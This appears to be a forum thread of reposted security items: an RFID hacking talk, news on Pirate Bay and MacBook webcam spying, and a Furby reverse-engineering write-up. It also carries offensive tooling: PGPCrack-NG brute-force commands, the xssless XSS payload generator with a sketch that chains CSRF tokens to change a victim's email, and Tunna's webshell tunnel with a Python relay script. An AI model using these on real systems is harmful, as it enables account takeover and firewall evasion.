Defending yourself from RFID hacking threats

This DEMO-rich presentation will benefit both newcomers and seasoned professionals of the physical penetration testing field.

Francis Brown (@security_snacks), CISA, CISSP, MCSE, is a Managing Partner at Bishop Fox (formerly Stach & Liu), a security consulting firm providing IT security services to the Fortune 1000 and global financial institutions as well as U.S. and foreign governments. Before joining Bishop Fox, Francis served as an IT Security Specialist with the Global Risk Assessment team of Honeywell International, where he performed network and application penetration testing, product security evaluations, incident response, and risk assessments of critical infrastructure. Prior to that, Francis was a consultant with the Ernst & Young Advanced Security Centers and conducted network, application, wireless, and remote access penetration tests for Fortune 500 clients.

Francis has presented his research at leading conferences such as Black Hat USA, DEF CON, RSA, InfoSec World, ToorCon, and HackCon and has been cited in numerous industry and academic publications. Francis holds a Bachelor of Science and Engineering from the University of Pennsylvania with a major in Computer Science and Engineering and a minor in Psychology. While at Penn, Francis taught operating system implementation and C programming, and participated in DARPA-funded research into advanced intrusion prevention system techniques.

https://www.facebook.com/BishopFoxConsulting
https://twitter.com/security_snacks

For More Information please visit: https://www.defcon.org/html/defcon-21/dc-21-speakers.html

Sursa: Defcon 21 - Rfid Hacking: Live Free Or Rfid Hard
  16. PGPCrack-NG

PGPCrack-NG is a program designed to brute-force symmetrically encrypted PGP files. It is a replacement for the long-dead PGPCrack.

On Fedora 19, do sudo yum install libassuan-devel -y. On Ubuntu, do sudo apt-get install libpth-dev libbz2-dev libassuan-dev. Compile using make. You might need to edit the -I/usr/include/libassuan2 part in the Makefile.

Run:

cat ~/magnum-jumbo/run/password.lst | ./PGPCrack-NG <PGP file>
john -i -stdout | ./PGPCrack-NG <PGP file>

Speed: > 1330 passwords / second on an AMD X3 720 CPU @ 2.8GHz (using a single core).

Sursa si download: https://github.com/kholia/PGPCrack-NG
  17. xssless – Automatic XSS Payload Generator

After working with more and more complex JavaScript payloads for XSS I realized that most of the work I was doing was unnecessary! I scraped together some snippets from my Metafidv2 project and created “xssless”, an automated XSS payload generator. This tool is sure to save some time on more complex sites that make use of tons of CSRF tokens and other annoying tricks. Psst! If you already understand all of this stuff and don’t want to read this post, click here for the github link.

The XSS Vulnerability

Once you have found your initial XSS vulnerability you’re basically there! Now you can do evil things like session hijacking and much more! But wait, what if the site is extra secure and locks you out if you use the same session token from a different IP address? Does this mean your newly found XSS is useless? Of course not!

XSS Worms & JavaScript Payloads

Remember, if you can execute JavaScript in the user’s browser you can do anything the user’s browser can do. This means as long as you’re obeying the same-origin policy, you’re good to go! How? JavaScript payloads of course! Not only are JavaScript payloads real, they are quite dangerous – people often write up XSS as being a ‘low priority’ issue in security. This is simply not true; I have to imagine this comes from a lack of amazement at the casual JavaScript popup alerts with session cookies as the message. Lest we forget how powerful the Samy Worm was, propagating to over a million accounts and running MySpace’s servers into the ground. This was one of the first big displays of just how powerful XSS could be.

Building Complex Payloads

Building payloads can be a real pain: custom coding every POST/GET request and parsing CSRF tokens, all while debugging to ensure it works. (A sketch of this manual token-chaining drudgery follows at the end of this post.) After building a rather complex payload I realized this is pointless; why couldn’t a script do the same?

xssless

Work smart, not hard: using xssless you can automatically generate payloads for any site quickly and efficiently. xssless generates payloads from Burp proxy exported requests, meaning you do your web actions in the browser through Burp and then export them into xssless.

An Example Scenario

Imagine if we had an XSS in reddit.com; of course we want to use this cool new exploit (because we lack morality and this is an example so bite me). We fire up Burp and set Firefox to use it as a proxy, now we just perform the web action we want to make a payload for. ...

Click Here for the Github Page

Sursa: xssless - Automatic XSS Payload Generator | The Hacker Blog
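(Appended note, referenced from the post above.) To get a feel for the manual drudgery that xssless automates, here is a hedged Python sketch of the scrape-token-then-replay dance a payload has to perform. A real XSS payload would do the same thing in JavaScript with XMLHttpRequest from inside the victim's browser; the URL and field names below are hypothetical:

# Fetch a form page, scrape its anti-CSRF token, then replay the POST with
# the fresh token included, preserving session cookies between requests.
import re
import urllib.parse
import urllib.request

opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor())

page = opener.open("http://example.com/settings").read().decode()
match = re.search(r'name="csrf_token" value="([^"]+)"', page)
assert match, "token not found"

data = urllib.parse.urlencode({
    "csrf_token": match.group(1),
    "email": "attacker@example.com",
}).encode()
response = opener.open("http://example.com/settings", data)
print(response.status)

Now imagine hand-writing that chain for a dozen token-protected requests; that is exactly the work the generator takes off your hands.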
  18. Fun stuff

  19. Tunna

Overview

Tunna is a tool designed to bypass firewall restrictions on remote webservers. It consists of a local application (supporting Ruby and Python) and a web application (supporting ASP.NET, Java and PHP).

Description

Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments. The web application file must be uploaded on the remote server. It will be used to make a local connection with services running on the remote web server or any other server in the DMZ. The local application communicates with the webshell over the HTTP protocol. It also exposes a local port for the client application to connect to. Since all external communication is done over HTTP, it is possible to bypass the filtering rules and connect to any service behind the firewall using the webserver on the other end. (A rough sketch of this wrap-TCP-over-HTTP idea follows at the end of this post.)

Tunna framework

The Tunna framework comes with the following functionality:

Ruby client - proxy bind: Ruby client proxy to perform the tunnel to the remote web application and tunnel TCP traffic.
Python client - proxy bind: Python client proxy to perform the tunnel to the remote web application and tunnel TCP traffic.
Metasploit integration module, which allows transparent execution of metasploit payloads on the server
ASP.NET remote script
Java remote script
PHP remote script

Author

Tunna has been developed by Nikos Vassakis.

Download: http://www.secforce.com/research/tunna_download.html

Sursa: SECFORCE :: Penetration Testing :: Research
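(Appended note, referenced from the description above.) This is not Tunna's actual wire protocol, just a minimal Python sketch of the general wrap-TCP-over-HTTP idea: a local listener accepts a TCP client and relays its bytes to a remote web script via HTTP POST, writing back whatever the script returns. The webshell URL is a placeholder:

# Accept one local TCP client and relay its traffic through HTTP POSTs to a
# remote web script. One POST per chunk; real tools keep connection state
# server-side and poll for return traffic instead.
import socket
import urllib.request

WEBSHELL = "http://target/conn.aspx"  # placeholder for the uploaded script

def relay(data):
    req = urllib.request.Request(
        WEBSHELL, data=data,
        headers={"Content-Type": "application/octet-stream"})
    with urllib.request.urlopen(req) as resp:
        return resp.read()

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(("127.0.0.1", 1234))  # local port the client application uses
server.listen(1)
client, _ = server.accept()
while True:
    chunk = client.recv(4096)
    if not chunk:
        break
    client.sendall(relay(chunk))

From the firewall's perspective, only ordinary HTTP requests to the webserver ever cross the perimeter, which is exactly why this class of tunnelling works in fully firewalled environments.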
  20. The Pirate Bay's Guyana Domain Goes Down

December 19th, 2013, 08:31 GMT · By Gabriela Vatu - The Pirate Bay's new domain is no longer working

The Pirate Bay has been on the run from domain to domain, changing quite a few over the past week. Only yesterday, the site left Peru and moved to the Republic of Guyana. Now, thepiratebay.gy is no longer working, although it’s uncertain whether the domain was seized, the site has moved on to another location, or there’s an issue with the servers.

The site’s insiders said that the easiest way to access the Pirate Bay would be via its old domains over at .SE and .ORG, which would redirect users to the newest homepage, wherever that might be. However, this doesn’t seem to be working either for now. The site’s admins said yesterday that they already had a bunch of domains set up in case they needed to leave again, mentioning that there were about 70 more domains to choose from.

Last week, Pirate Bay lost its .SX domain. From there, it moved to Ascension Island’s .AC for about a day, before going to the Peruvian domain. Yesterday, the site had to relocate to .GY. As soon as the site settles on a new domain, the blog will be updated, so check back soon.

[UPDATE] The Pirate Bay site seems to be working on the Swedish .SE domain for now, but it looks like it's impossible to download any magnet links at the moment. Most likely, the torrent site is only passing through as it seeks to settle into a new domain.

Sursa: The Pirate Bay's Guyana Domain Goes Down [UPDATE]
  21. Research shows how MacBook Webcams can spy on their users without warning

By Ashkan Soltani and Timothy B. Lee, December 18 at 2:25 pm

The woman was shocked when she received two nude photos of herself by e-mail. The photos had been taken over a period of several months — without her knowledge — by the built-in camera on her laptop. Fortunately, the FBI was able to identify a suspect: her high school classmate, a man named Jared Abrahams. The FBI says it found software on Abrahams’s computer that allowed him to spy remotely on her and numerous other women. Abrahams pleaded guilty to extortion in October. The woman, identified in court papers only as C.W., later identified herself on Twitter as Miss Teen USA Cassidy Wolf. While her case was instant fodder for celebrity gossip sites, it left a serious issue unresolved. Most laptops with built-in cameras have an important privacy feature — a light that is supposed to turn on any time the camera is in use. But Wolf says she never saw the light on her laptop go on. As a result, she had no idea she was under surveillance.

That wasn’t supposed to be possible. While controlling a camera remotely has long been a source of concern to privacy advocates, conventional wisdom said there was at least no way to deactivate the warning light. New evidence indicates otherwise. Marcus Thomas, former assistant director of the FBI’s Operational Technology Division in Quantico, said in a recent story in The Washington Post that the FBI has been able to covertly activate a computer’s camera — without triggering the light that lets users know it is recording — for several years.

Now research from Johns Hopkins University provides the first public confirmation that it’s possible to do just that, and demonstrates how. While the research focused on MacBook and iMac models released before 2008, the authors say similar techniques could work on more recent computers from a wide variety of vendors. In other words, if a laptop has a built-in camera, it’s possible someone — whether the federal government or a malicious 19-year-old — could access it to spy on the user at any time.

One laptop, many chips

The built-in cameras on Apple computers were designed to prevent this, says Stephen Checkoway, a computer science professor at Johns Hopkins and a co-author of the study. “Apple went to some amount of effort to make sure that the LED would turn on whenever the camera was taking images,” Checkoway says. The 2008-era Apple products they studied had a “hardware interlock” between the camera and the light to ensure that the camera couldn’t turn on without alerting its owner.

The cameras Brocker and Checkoway studied. (Matthew Brocker and Stephen Checkoway)

But Checkoway and his co-author, Johns Hopkins graduate student Matthew Brocker, were able to get around this security feature. That’s because a modern laptop is actually several different computers in one package. “There’s more than one chip on your computer,” says Charlie Miller, a security expert at Twitter. “There’s a chip in the battery, a chip in the keyboard, a chip in the camera.” MacBooks are designed to prevent software running on the MacBook’s central processing unit (CPU) from activating its iSight camera without turning on the light. But the researchers figured out how to reprogram the chip inside the camera, known as a microcontroller, to defeat this security feature.
In a paper called “iSeeYou: Disabling the MacBook Webcam Indicator LED,” Brocker and Checkoway describe how to reprogram the iSight camera’s microcontroller to allow the camera and light to be activated independently. That allows the camera to be turned on while the light stays off. Their research is under consideration for an upcoming academic security conference.

The researchers also provided us with a copy of their proof-of-concept software. In the video below, we demonstrate how the camera can be activated without triggering the telltale warning light.

Attacks that exploit microcontrollers are becoming more common. “People are starting to think about what happens when you can reprogram each of those,” Miller says. For example, he demonstrated an attack last year on the software that controls Apple batteries, which causes the battery to discharge rapidly, potentially leading to a fire or explosion. Another researcher was able to convert the built-in Apple keyboard into spyware using a similar method.

According to the researchers, the vulnerability they discovered affects “Apple internal iSight webcams found in earlier-generation Apple products, including the iMac G5 and early Intel-based iMacs, MacBooks, and MacBook Pros until roughly 2008.” While the attack outlined in the paper is limited to these devices, researchers like Charlie Miller suggest that the attack could be applicable to newer systems as well. “There’s no reason you can’t do it -- it’s just a lot of work and resources but it depends on how well [Apple] secured the hardware,” Miller says.

Apple did not reply to requests for comment. Brocker and Checkoway write in their report that they contacted the company on July 16. “Apple employees followed up several times but did not inform us of any possible mitigation plans,” the researchers write.

RATted out

The software used by Abrahams in the Wolf case is known as a Remote Administration Tool, or RAT. This software, which allows someone to control a computer from across the Internet, has legitimate purposes as well as nefarious ones. For example, it can make it easier for a school’s IT staff to administer a classroom full of computers. Indeed, the devices the researchers studied were similar to MacBooks involved in a notorious case in Pennsylvania in 2008. In that incident, administrators at Lower Merion High School outside Philadelphia reportedly captured 56,000 images of students using the RAT installed on school-issued laptops. Students reported seeing a ‘creepy’ green flicker that indicated that the camera was in use. That helped to alert students to the issue, eventually leading to a lawsuit.

But more sophisticated remote monitoring tools may already have the capabilities to suppress the warning light, says Morgan Marquis-Boire, a security researcher at the University of Toronto. He says that cheap RATs like the one used in Merion High School may not have the ability to disable the hardware LEDs, but “you would probably expect more sophisticated surveillance offerings which cost hundreds of thousands of euros” to be stealthier. He points to commercial surveillance products such as Hacking Team and FinFisher that are marketed for use by governments. FinFisher is a suite of tools sold by a European firm called the Gamma Group.
A company marketing document released by WikiLeaks indicated that FinFisher could be “covertly deployed on the Target Systems” and enable, among other things, “Live Surveillance through Webcam and Microphone.”

The Chinese government has also been accused of using RATs for surveillance purposes. A 2009 report from the University of Toronto described a surveillance program called Ghostnet that the Chinese government allegedly used to spy on prominent Tibetans, including the Dalai Lama. The authors reported that “web cameras are being silently triggered, and audio inputs surreptitiously activated,” though it’s not clear whether the Ghostnet software is capable of disabling camera warning lights.

Luckily, there’s an easy way for users to protect themselves. “The safest thing to do is to put a piece of tape on your camera,” Miller says.

Ashkan Soltani is an independent security researcher and consultant.

Sursa: Research shows how MacBook Webcams can spy on their users without warning
  22. So, as suggestions:

1. Disable JavaScript (temporarily)
2. Random user agent
3. Spoof MAC

Anything else?
  23. Reverse Engineering a Furby

Table of Contents

Introduction
About the Device
Inter-Device Communication
Reversing the Android App
Reversing the Hardware
Dumping the EEPROM
Decapping Proprietary Chips
SEM Imaging of Decapped Chips

Introduction

This past semester I’ve been working on a directed study at my university with Prof. Wil Robertson reverse engineering embedded devices. After a couple of months looking at a passport scanner, one of my friends jokingly suggested I hack a Furby, the notoriously annoying toy of late 1990s fame. Everyone laughed, and we all moved on with our lives. However, the joke didn’t stop there. Within two weeks, this same friend said they had a present for me. And that’s how I started reverse engineering a Furby.

About the Device

A Furby is an evil robotic children’s toy wrapped in colored fur. Besides speaking its own gibberish-like language called Furbish, a variety of sensors and buttons allow it to react to different kinds of stimuli. Since its original debut in 1998, the Furby apparently received a number of upgrades and new features. The specific model I looked at was from 2012, which supported communication between devices, sported LCD eyes, and even came with a mobile app.

Inter-Device Communication

As mentioned above, one feature of the 2012 version was the toy’s ability to communicate with other Furbys as well as the mobile app. However, after some investigation I realized that it didn’t use Bluetooth, RF, or any other common wireless protocols. Instead, a look at the official Hasbro Furby FAQ told a more interesting story:

Q. There is a high pitched tone coming from Furby and/or my iOS device.
A. The noise you are hearing is how Furby communicates with the mobile device and other Furbys. Some people may hear it, others will not. Some animals may also hear the noise. Don’t worry, the tone will not cause any harm to people or animals.

Digging into this lead, I learned that Furbys in fact perform inter-device communication with an audio protocol that encodes data into bursts of high-pitch frequencies. That is, devices communicate with one another via high-pitch sound waves with a speaker and microphone. #badBIOS anyone?

This was easily confirmed by use of the mobile app, which emitted a modulated sound similar to the mosquito tone whenever an item or command was sent to the Furby. The toy would also respond with a similar sound which was recorded by the phone’s microphone and decoded by the app.

Upon searching, I learned that other individuals had performed a bit of prior work in analyzing this protocol. Notably, the GitHub project Hacksby appears to have successfully reverse engineered the packet specification, developed scripts to encode and decode data, and compiled a fairly complete database of events understood by the Furby.

Reversing the Android App

Since the open source database of events is not currently complete, I decided to spend a few minutes looking at the Android app to identify how it performed its audio decoding. After grabbing the .apk via APK Downloader, it was simple work to get to the app’s juicy bits:

$ unzip -q com.hasbro.furby.apk
$ d2j-dex2jar.sh classes.dex
dex2jar classes.dex -> classes-dex2jar.jar
$

Using jd-gui, I then decompiled classes-dex2jar.jar into a set of .java source files. I skimmed through the source files of a few app features that utilized the communication protocol (e.g., Deli, Pantry, Translator) and noticed a few calls to methods named sendComAirCmd().
Each method accepted an integer as input, which was spliced and passed to objects created from the generalplus.com.GPLib.ComAirWrapper class:

private void sendComAirCmd(int paramInt)
{
    Logger.log(Deli.TAG, "sent command: " + paramInt);
    Integer localInteger1 = Integer.valueOf(paramInt);
    // split the command into its upper 5 bits...
    int i = 0x1F & localInteger1.intValue() >> 5;
    // ...and its lower 5 bits, offset by 32
    int j = 32 + (0x1F & localInteger1.intValue());
    ComAirWrapper.ComAirCommand[] arrayOfComAirCommand = new ComAirWrapper.ComAirCommand[2];
    ComAirWrapper localComAirWrapper1 = this.comairWrapper;
    localComAirWrapper1.getClass();
    arrayOfComAirCommand[0] = new ComAirWrapper.ComAirCommand(localComAirWrapper1, i, 0.5F);
    ComAirWrapper localComAirWrapper2 = this.comairWrapper;
    localComAirWrapper2.getClass();
    arrayOfComAirCommand[1] = new ComAirWrapper.ComAirCommand(localComAirWrapper2, j, 0.0F);

The name generalplus appears to identify the Taiwanese company General Plus, which “engage in the research, development, design, testing and sales of high quality, high value-added consumer integrated circuits (ICs).” I was unable to find any public information about the GPLib/ComAir library. However, a thread on /g/ from 2012 appears to have made some steps towards identifying the General Plus chip, among others.

The source code at generalplus/com/GPLib/ComAirWrapper.java defined a number of methods providing wrapper functionality around encoding and decoding data, though none of the functionality itself. Continuing to dig, I found the file libGPLibComAir.so:

$ file lib/armeabi/libGPLibComAir.so
lib/armeabi/libGPLibComAir.so: ELF 32-bit LSB shared object, ARM, version 1 (SYSV), dynamically linked, stripped

Quick analysis on the binary showed that this was likely the code I had been looking for:

$ nm -D lib/armeabi/libGPLibComAir.so | grep -i -e encode -e decode -e command
0000787d T ComAir_GetCommand
00004231 T Java_generalplus_com_GPLib_ComAirWrapper_Decode
000045e9 T Java_generalplus_com_GPLib_ComAirWrapper_GenerateComAirCommand
00004585 T Java_generalplus_com_GPLib_ComAirWrapper_GetComAirDecodeMode
000045c9 T Java_generalplus_com_GPLib_ComAirWrapper_GetComAirEncodeMode
00004561 T Java_generalplus_com_GPLib_ComAirWrapper_SetComAirDecodeMode
000045a5 T Java_generalplus_com_GPLib_ComAirWrapper_SetComAirEncodeMode
000041f1 T Java_generalplus_com_GPLib_ComAirWrapper_StartComAirDecode
00004211 T Java_generalplus_com_GPLib_ComAirWrapper_StopComAirDecode
00005af5 T _Z13DecodeRegCodePhP15tagCustomerInfo
000058cd T _Z13EncodeRegCodethPh
00004f3d T _ZN12C_ComAirCore12DecodeBufferEPsi
00004c41 T _ZN12C_ComAirCore13GetDecodeModeEv
00004ec9 T _ZN12C_ComAirCore13GetDecodeSizeEv
00004b69 T _ZN12C_ComAirCore13SetDecodeModeE16eAudioDecodeMode
000050a1 T _ZN12C_ComAirCore16SetPlaySoundBuffEP19S_ComAirCommand_Tag
00004e05 T _ZN12C_ComAirCore6DecodeEPsi
00005445 T _ZN15C_ComAirEncoder10SetPinCodeEs
00005411 T _ZN15C_ComAirEncoder11GetiDfValueEv
0000547d T _ZN15C_ComAirEncoder11PlayCommandEi
000053fd T _ZN15C_ComAirEncoder11SetiDfValueEi
00005465 T _ZN15C_ComAirEncoder12IsCmdPlayingEv
0000588d T _ZN15C_ComAirEncoder13GetComAirDataEPPcRi
000053c9 T _ZN15C_ComAirEncoder13GetEncodeModeEv
000053b5 T _ZN15C_ComAirEncoder13SetEncodeModeE16eAudioEncodeMode
000053ed T _ZN15C_ComAirEncoder14GetCentralFreqEv
00005379 T _ZN15C_ComAirEncoder14ReleasePlayersEv
000053d9 T _ZN15C_ComAirEncoder14SetCentralFreqEi
000056c1 T _ZN15C_ComAirEncoder15GenComAirBufferEiPiPs
00005435 T _ZN15C_ComAirEncoder15GetWaveFormTypeEv
000054bd T _ZN15C_ComAirEncoder15PlayCommandListEiP20tagComAirCommandList
00005421 T _ZN15C_ComAirEncoder15SetWaveFormTypeEi
00005645 T _ZN15C_ComAirEncoder17PlayComAirCommandEif
00005755 T _ZN15C_ComAirEncoder24FillWavInfoAndPlayBufferEiPsf
00005369 T _ZN15C_ComAirEncoder4InitEv
000051f9 T _ZN15C_ComAirEncoderC1Ev
000050b9 T _ZN15C_ComAirEncoderC2Ev
00005351 T _ZN15C_ComAirEncoderD1Ev
00005339 T _ZN15C_ComAirEncoderD2Ev

I loaded the binary in IDA Pro and quickly confirmed my thought. The method generalplus.com.GPLib.ComAirWrapper.Decode() decompiled to the following function:

unsigned int __fastcall Java_generalplus_com_GPLib_ComAirWrapper_Decode(int a1, int a2, int a3)
{
  int v3; // ST0C_4@1
  int v4; // ST04_4@1
  int v5; // ST1C_4@1
  const void *v6; // ST18_4@1
  unsigned int v7; // ST14_4@1

  v3 = a1;
  v4 = a3;
  v5 = _JNIEnv::GetArrayLength();
  v6 = (const void *)_JNIEnv::GetShortArrayElements(v3, v4, 0);
  v7 = C_ComAirCore::DecodeBuffer((int)&unk_10EB0, v6, v5);
  _JNIEnv::ReleaseShortArrayElements(v3);
  return v7;
}

Within C_ComAirCore::DecodeBuffer() resided a looping call to ComAir_DecFrameProc(), which appeared to be referencing some table of phase coefficients:

int __fastcall ComAir_DecFrameProc(int a1, int a2)
{
  int v2; // r5@1
  signed int v3; // r4@1
  int v4; // r0@3
  int v5; // r3@5
  signed int v6; // r2@5

  v2 = a1;
  v3 = 0x40;
  if ( ComAir_Rate_Mode != 1 )
  {
    v3 = 0x80;
    if ( ComAir_Rate_Mode == 2 )
      v3 = 0x20;
  }
  v4 = (a2 << 0xC) / 0x64;
  if ( v4 > (signed int)&PHASE_COEF[0x157F] )
    v4 = (int)&PHASE_COEF[0x157F];
  v5 = v2;
  v6 = 0;
  do
  {
    ++v6;
    *(_WORD *)v5 = (unsigned int)(*(_WORD *)v5 * v4) >> 0x10;
    v5 += 2;
  }
  while ( v3 > v6 );
  ComAirDec();
  return ComAir_GetCommand();
}

Near the end of the function was a call to the very large function ComAirDec(), which was likely decompiled with the incorrect number of arguments and performed the bulk of the audio decoding process. Data was transformed and parsed, and a number of symbols apparently associated with frequency-shift keying were referenced. Itching to continue on to reverse engineering the hardware, I began disassembling the device.

Reversing the Hardware

Actually disassembling the Furby itself proved more difficult than expected due to the form factor of the toy and the number of hidden screws. Since various tear-downs of the hardware are already available online, let’s just skip ahead to extracting juicy secrets from the device.

The heart of the Furby lies in the following two-piece circuit board:

Thanks to another friend, I also had access to a second Furby 2012 model, this time the French version. Although the circuit boards of both devices were incredibly similar, differences did exist, most notably in the layout of the right-hand daughterboard. Additionally, the EEPROM chip (U2 on the board) was branded Shenzen LIZE on the U.S. version, while the French version's was branded ATMEL:

The first feature I noticed about the boards was the fact that a number of chips were hidden by a thick blob of epoxy. This is likely meant to thwart reverse engineers, as many of the important chips on the Furby are actually proprietary and designed (or at least contracted for development) by Hasbro. This is a standard PCB assembly technique known as “chip-on-board” or “direct chip attachment,” though it proves harder to identify the chips due to the lack of markings. However, one may still simply inspect the traces connected to the chip and infer its functionality from there. For now, let’s start with something more accessible and dump the exposed EEPROM.
Dumping the EEPROM

The EEPROM chip on the French version Furby is fairly standard and may be easily identified by its form and markings:

By googling the markings, we find the datasheet and learn that it is a 24Cxx family EEPROM chip manufactured by ATMEL. This particular chip provides 2048 bits of memory (256 bytes), speaks I2C, and offers a write protect pin to prevent accidental data corruption. The chip on the U.S. version Furby has similar specs but is marked L24C02B-SI and manufactured by Shenzen LIZE.

Using the same technique as on my Withings WS-30 project, I used a heat gun to desolder the chip from the board. Note that this MUST be done in a well-ventilated area. Intense, direct heat will likely scorch the board and release horrible chemicals into the air.

Unlike my Withings WS-30 project, however, I no longer had access to an ISP programmer and would need to wire the EEPROM manually. I chose to use my Arduino Duemilanove since it provides an I2C interface and accompanying libraries for easy development.

Referencing the datasheet, we find that there are eight total pins to deal with. Pins 1-3 (A0, A1, A2) are device address input pins and are used to assign a unique identifier to the chip. Since multiple EEPROM chips may be wired in parallel, a method must be used to identify which chip a controller wishes to speak with. By pulling the A0, A1, and A2 pins high or low, a 3-bit number is formed that uniquely identifies the chip. Since we only have one EEPROM, we can simply tie all three to ground. Likewise, pin 4 (GND) is also connected to ground.

Pins 5 and 6 (SDA, SCL) designate the data and clock pins on the chip, respectively. These pins are what give “Two Wire Interface” (TWI) its name, as full communication may be achieved with just these two lines. SDA provides bi-directional serial data transfer, while SCL provides a clock signal.

Pin 7 (WP) is the write protect pin and provides a means to place the chip in read-only mode. Since we have no intention of writing to the chip (we only want to read the chip without corrupting its contents), we can pull this pin high (5 volts). Note that some chips provide a “negative” WP pin; that is, connecting it to ground will enable write protection and pulling it high will disable it. Pin 8 (VCC) is also connected to the same positive power source.

After some time learning the Wire library and looking at example code online, I used the following Arduino sketch to successfully dump 256 bytes of data from the French version Furby EEPROM chip (a small helper for capturing its output appears at the end of this post):

#include <Wire.h>

#define disk1 0x50 // Address of eeprom chip

byte i2c_eeprom_read_byte( int deviceaddress, unsigned int eeaddress ) {
  byte rdata = 0x11;
  Wire.beginTransmission(deviceaddress);
  // Wire.write((int)(eeaddress >> 8)); // MSB
  Wire.write((int)(eeaddress & 0xFF)); // LSB
  Wire.endTransmission();
  Wire.requestFrom(deviceaddress,1);
  if (Wire.available()) rdata = Wire.read();
  return rdata;
}

void setup(void) {
  Serial.begin(9600);
  Wire.begin();
  unsigned int i, j;
  unsigned char b;
  for ( i = 0; i < 16; i++ ) {
    for ( j = 0; j < 16; j++ ) {
      b = i2c_eeprom_read_byte(disk1, (i * 16) + j);
      if ( (b & 0xf0) == 0 ) Serial.print("0");
      Serial.print(b, HEX);
      Serial.print(" ");
    }
    Serial.println();
  }
}

void loop(){}

Note that unlike most code examples online, the “MSB” line of code within i2c_eeprom_read_byte() is commented out. Since our EEPROM chip is only 256 bytes large, we are only using 8-bit memory addressing, hence using a single byte.
Larger memory capacities require use of larger address spaces (9 bits, 10 bits, and so on), which require two bytes to accommodate all necessary address bits. Upon running the sketch, we are presented with the following output:

2F 64 00 00 00 00 5A EB 2F 64 00 00 00 00 5A EB
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
05 00 00 04 00 00 02 18 05 00 00 04 00 00 02 18
0F 00 00 00 00 00 18 18 0F 00 00 00 00 00 18 18
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8

Unfortunately, without much guidance or further analysis of the hardware (perhaps at runtime), it is difficult to make sense of this data. By watching the contents change over time or in response to specific events, it may be possible to gain a better understanding of these few bytes.

Decapping Proprietary Chips

With few other interesting chips freely available to probe, I turned my focus to the proprietary chips hidden by epoxy. Having seen a number of online resources showcase the fun that is chip decapping, I had the urge to try it myself. Additionally, the use of corrosive acid might just solve the issue of the epoxy in itself. Luckily, with the assistance and guidance of my Chemistry professor Dr. Geoffrey Davies, I was able to utilize the lab resources of my university and decap chips in a proper and safe manner.

First, I isolated the three chips I wanted to decap (henceforth referenced as tiny, medium, and large) by desoldering their individual boards from the main circuit board. Since the large chip was directly connected to the underside of the board, I simply took a pair of shears and cut around it.

Each chip was placed in its own beaker of 70% nitric acid (HNO3) on a hot plate at 68°C. Great care was taken to ensure that absolutely no amount of HNO3 came in contact with skin or was accidentally consumed. The entire experiment took place in a fume hood, which ensured that the toxic nitrogen dioxide (NO2) gas produced by the reaction was safely evacuated and not breathed in.

Each sample took a different amount of time to fully decompose the epoxy, circuit board, and chip casing depending on its size. Since I was working with a lower concentration of nitric acid than professionals typically use (red/white fuming nitric acid is generally preferred), the overall process took between 1-3 hours.

“Medium” (left) and “Tiny” (right)

After each chip had been fully exposed and any leftover debris removed, I removed the beakers from the hot plate, let them cool, and decanted the remaining nitric acid into a waste collection beaker, leaving the decapped chips behind. A small amount of distilled water was then added to each beaker and the entirety of it poured onto filter paper. After rinsing each sample one or two more times with distilled water, the sample was then rinsed with acetone two or three times.

The large chip took the longest to finish, simply due to the size of the attached circuit board fragment. About 2.5 hours in, the underside of the chip had been exposed, though the epoxy blob had still not been entirely decomposed.
At this point, the bonding wires for the chip (guessed to be a microcontroller) were still visible and intact:

About thirty minutes later, and with the addition of more nitric acid, all three samples were cleaned and ready for imaging:

SEM Imaging of Decapped Chips

The final step was to take high resolution images of each chip to learn more about its design and identify any potential manufacturer markings. Once again, I leveraged university resources and was able to make use of a Hitachi S-4800 scanning electron microscope (SEM), with great thanks to Dr. William Fowle.

Each decapped chip was placed on a double-sided adhesive attached to a sample viewing plate. A few initial experimental SEM images were taken; however, a number of artifacts were present that severely affected the image quality. To counter this, a small amount of colloidal graphite paint was added around the edges of each chip to provide a pathway to ground for the electrons. Additionally, the viewing plate was treated in a sputter coater machine where each chip was coated with 4.5nm of palladium to create a more conductive surface.

After treatment, the samples were placed back in the SEM and imaged with greater success. Each chip was imaged in pieces, and each individual image was stitched together to form a single large, high resolution picture. The small and large chip overview images were shot at 5.0kV at 150x magnification, while the medium chip overview image was shot at 5.0kV at 30x magnification:

Unfortunately, as can be seen in the image above, the medium chip did not appear to have been cleaned completely in its nitric acid bath. Although it is believed to be a memory storage device of some sort (judging by optical images), it is impossible to discern any finer details from the SEM image.

A number of interesting features were found during the imaging process. The marking “GHG554” may be clearly seen directly west on the small chip. Additionally, in a similar font face, the marking “GFI392” may be seen on the south-east corner of the large chip:

Higher zoom images were also taken of generally interesting topology on the chips. For instance, the following two images show what looks like a “cheese grater” feature on both the small and large chips:

If you are familiar with any of these chips or their features, feedback would be greatly appreciated.

EDIT: According to cpldcpu, thebobfoster, and Thilo, the “cheese grater” structures are likely bond pads.

Additional images taken throughout this project are available at: Flickr: mncoppola's Photostream

Tremendous thanks go out to the following people for their guidance and donation of time and resources towards this project:

Prof. Wil Robertson – College of Computer and Information Science @ NEU
Dr. Geoffrey Davies – Dept. of Chemistry & Chemical Biology @ NEU
Dr. William Fowle – Nanomaterials Instrumentation Facility @ NEU
Molly White
Kaylie DeHart

Sursa: Reverse Engineering a Furby | Michael Coppola's Blog
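(Appended note, referenced from the EEPROM section above.) A small, hedged helper for capturing the Arduino sketch's 16 rows of hex output from the serial port into a binary file for offline analysis; it assumes the third-party pyserial package and a Linux-style port name:

# Read the sketch's 16 rows of hex from the Arduino's serial port and save
# the 256 bytes to disk. Port name and baud rate (9600, per the sketch)
# are assumptions.
import serial  # third-party: pip install pyserial

rows = []
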